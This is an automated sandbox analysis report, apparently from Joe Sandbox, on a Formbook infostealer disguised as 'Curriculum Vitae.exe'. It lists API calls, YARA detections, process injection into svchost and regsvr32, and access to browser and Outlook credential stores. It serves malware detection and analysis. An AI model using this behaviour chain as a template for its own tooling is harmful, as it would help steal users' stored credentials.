            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072D30 NtUnmapViewOfSection,2_2_03072D30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072DB0 NtEnumerateKey,2_2_03072DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072DD0 NtDelayExecution,2_2_03072DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072C00 NtQueryInformationProcess,2_2_03072C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072C60 NtCreateKey,2_2_03072C60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072CA0 NtQueryInformationToken,2_2_03072CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072CC0 NtQueryVirtualMemory,2_2_03072CC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072CF0 NtOpenProcess,2_2_03072CF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03073010 NtOpenDirectoryObject,2_2_03073010
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03073090 NtSetValueKey,2_2_03073090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030739B0 NtGetContextThread,2_2_030739B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03073D10 NtOpenProcessToken,2_2_03073D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03073D70 NtOpenThread,2_2_03073D70
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD4650 NtSuspendThread,LdrInitializeThunk,6_2_04BD4650
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD4340 NtSetContextThread,LdrInitializeThunk,6_2_04BD4340
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04BD2CA0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04BD2C70
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2C60 NtCreateKey,LdrInitializeThunk,6_2_04BD2C60
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04BD2DF0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2DD0 NtDelayExecution,LdrInitializeThunk,6_2_04BD2DD0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04BD2D30
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04BD2D10
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_04BD2E80
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04BD2EE0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2FB0 NtResumeThread,LdrInitializeThunk,6_2_04BD2FB0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2FE0 NtCreateFile,LdrInitializeThunk,6_2_04BD2FE0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2F30 NtCreateSection,LdrInitializeThunk,6_2_04BD2F30
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2AF0 NtWriteFile,LdrInitializeThunk,6_2_04BD2AF0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2AD0 NtReadFile,LdrInitializeThunk,6_2_04BD2AD0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_04BD2BA0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04BD2BF0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04BD2BE0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2B60 NtClose,LdrInitializeThunk,6_2_04BD2B60
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD35C0 NtCreateMutant,LdrInitializeThunk,6_2_04BD35C0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD39B0 NtGetContextThread,LdrInitializeThunk,6_2_04BD39B0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2CF0 NtOpenProcess,6_2_04BD2CF0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2CC0 NtQueryVirtualMemory,6_2_04BD2CC0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2C00 NtQueryInformationProcess,6_2_04BD2C00
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2DB0 NtEnumerateKey,6_2_04BD2DB0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2D00 NtSetInformationFile,6_2_04BD2D00
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2EA0 NtAdjustPrivilegesToken,6_2_04BD2EA0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2E30 NtWriteVirtualMemory,6_2_04BD2E30
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2FA0 NtQuerySection,6_2_04BD2FA0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2F90 NtProtectVirtualMemory,6_2_04BD2F90
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2F60 NtCreateProcessEx,6_2_04BD2F60
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2AB0 NtWaitForSingleObject,6_2_04BD2AB0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD2B80 NtQueryInformationFile,6_2_04BD2B80
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD3090 NtSetValueKey,6_2_04BD3090
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD3010 NtOpenDirectoryObject,6_2_04BD3010
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD3D10 NtOpenProcessToken,6_2_04BD3D10
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04BD3D70 NtOpenThread,6_2_04BD3D70
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_02948EB0 NtReadFile,6_2_02948EB0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_02948FA0 NtDeleteFile,6_2_02948FA0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_02948D40 NtCreateFile,6_2_02948D40
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_02949050 NtClose,6_2_02949050
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_029491B0 NtAllocateVirtualMemory,6_2_029491B0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_048BF2DC NtReadVirtualMemory,6_2_048BF2DC
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D9D5EB CreateFileW,DeviceIoControl,CloseHandle,0_2_00D9D5EB
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D91201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00D91201
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D9E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00D9E8F6
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: String function: 00D50A30 appears 46 times
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: String function: 00D4F9F2 appears 40 times
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: String function: 00D39CB3 appears 31 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 102 times
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 04C1F290 appears 105 times
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 04BD5130 appears 58 times
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 04BE7E54 appears 103 times
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 04B8B970 appears 280 times
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 04C0EA12 appears 86 times
            Source: Curriculum Vitae.exe, 00000000.00000003.2108400826.0000000004183000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Curriculum Vitae.exe
            Source: Curriculum Vitae.exe, 00000000.00000003.2109326130.000000000432D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Curriculum Vitae.exe
            Source: Curriculum Vitae.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3269294970.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3269532701.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3272150093.00000000051D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3270513157.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2666088394.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2666668441.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3270554488.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2665951843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@5/4
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00DA37B5 GetLastError,FormatMessageW,0_2_00DA37B5
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D910BF AdjustTokenPrivileges,CloseHandle,0_2_00D910BF
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00D916C3
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00DA51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00DA51CD
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00DBA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00DBA67C
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00DA648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00DA648E
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D342A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00D342A2
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | File created: C:\Users\user\AppData\Local\Temp\aut188B.tmp
            Source: Curriculum Vitae.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.3269626827.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Curriculum Vitae.exe | ReversingLabs: Detection: 65%
            Source: Curriculum Vitae.exe | Virustotal: Detection: 60%
            Source: unknown | Process created: C:\Users\user\Desktop\Curriculum Vitae.exe "C:\Users\user\Desktop\Curriculum Vitae.exe"
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Curriculum Vitae.exe"
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\SysWOW64\regsvr32.exe"
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Section loaded: ntmarta.dll
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: aclayers.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc_os.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Curriculum Vitae.exe | Static file information: File size 1268224 > 1048576
            Source: Curriculum Vitae.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Curriculum Vitae.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Curriculum Vitae.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Curriculum Vitae.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Curriculum Vitae.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Curriculum Vitae.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Curriculum Vitae.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OAIexgManRWDie.exe, 00000005.00000002.3269982810.0000000000E9E000.00000002.00000001.01000000.00000005.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270006592.0000000000E9E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Curriculum Vitae.exe, 00000000.00000003.2110503181.0000000004250000.00000004.00001000.00020000.00000000.sdmp, Curriculum Vitae.exe, 00000000.00000003.2109991860.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564850998.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2562563965.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2666256185.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2666256185.0000000003000000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.3270855352.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.2666154415.000000000480C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.2668247041.00000000049B2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.3270855352.0000000004B60000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Curriculum Vitae.exe, 00000000.00000003.2110503181.0000000004250000.00000004.00001000.00020000.00000000.sdmp, Curriculum Vitae.exe, 00000000.00000003.2109991860.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2564850998.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2562563965.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2666256185.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2666256185.0000000003000000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, regsvr32.exe, 00000006.00000002.3270855352.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.2666154415.000000000480C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.2668247041.00000000049B2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.3270855352.0000000004B60000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: regsvr32.pdb source: svchost.exe, 00000002.00000002.2666122437.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2633856083.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000002.3269624546.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000003.2611854418.000000000080B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: regsvr32.pdbGCTL source: svchost.exe, 00000002.00000002.2666122437.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2633856083.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000002.3269624546.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000003.2611854418.000000000080B000.00000004.00000001.00020000.00000000.sdmp
            Source: Curriculum Vitae.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Curriculum Vitae.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Curriculum Vitae.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Curriculum Vitae.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Curriculum Vitae.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D342DE
            Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00D50A76 push ecx; ret 0_2_00D50A89
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00411164 push esi; retf 2_2_00411185
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00411173 push esi; retf 2_2_00411185
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417932 push ebp; retf 2_2_00417933
